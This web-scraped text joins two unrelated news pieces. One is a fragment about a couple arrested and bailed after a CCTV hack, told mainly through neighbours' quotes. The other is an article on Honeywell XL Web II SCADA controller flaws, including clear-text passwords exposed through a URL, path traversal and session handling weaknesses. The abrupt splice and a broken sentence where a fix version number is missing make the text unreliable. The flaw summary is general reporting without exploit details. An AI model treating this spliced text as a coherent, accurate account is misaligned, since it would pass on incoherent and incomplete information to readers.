CCTV security was hacked days before the inauguration Credit: AP/AP
The National Crime Agency said: "Enquiries are ongoing and we are unable to provide further information at this time."
The couple have been bailed until April. Neighbours of the man and woman arrested said they keep themselves to themselves.
Police cars and officers raided the residential road at around 5.30pm. A woman who lives near the raided house, said: "My sister had just come back from work and saw a couple of police cars around 5.30pm.
"Then later more cars turned up and we could see the blue lights filling the whole house.
"They keep themselves to themselves.
"This is a quiet street and there never any trouble round here."
Another neighbour, who did not want to be named, said: "I saw a lot of police arrive a few weeks ago.
"I don't know what it was about, but I saw them go in the house.
"I've spoken to the guy a few times, he seems really nice and we often have a chat in the street."

Honeywell SCADA Controllers Exposed Passwords in Clear Text

A series of remotely exploitable vulnerabilities exist in a popular web-based SCADA system made by Honeywell that make it easy to expose passwords and in turn, give attackers a foothold into the vulnerable network.
The flaws exist in some versions of Honeywell’s XL Web II controllers, systems deployed across the critical infrastructure sector, including wastewater, energy, and manufacturing companies.
An advisory from the Department of Homeland Security’s Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) warned about the vulnerabilities Thursday.

According to ICS-CERT, specifically Honeywell’s XL1000C500 XLWebExe-2-01-00 and prior, and XLWeb 500 XLWebExe-1-02-08 and prior are vulnerable. The company has developed a fix, version, to address the issues but users have to call their local Honeywell Building Solutions branch to receive the update, according to the company.
The controllers suffer from five vulnerabilities in total but the scariest one might be the fact that passwords for the controllers are stored in clear text. Furthermore, if attackers wanted to, they could disclose that password simply by accessing a particular URL.
An attacker could also carry out a path traversal attack by accessing a specific URL, open and change some parameters by accessing a particular URL, or establish a new user session. The problem with starting a new user session is that the controllers didn’t invalidate any existing session identifier, something that could have made it easier for an attacker to steal any active authenticated sessions.
Maxim Rupp, an independent security researcher based in Germany, dug up the bugs and teased them on Twitter at the beginning of January. He described them in depth in a blog post earlier this week.

Rupp has identified bugs in Honeywell equipment before. Two years ago he discovered a pair of vulnerabilities in Tuxedo Touch, a home automation controller made by the company, that could have let an attacker unlock a house’s doors or modify its climate controls.
It’s unclear how widespread the usage of Honeywell’s XL Web II controllers is. While Honeywell is a US-based company, according to ICS-CERT’s advisory the majority of the affected products are used in Europe and the Middle East.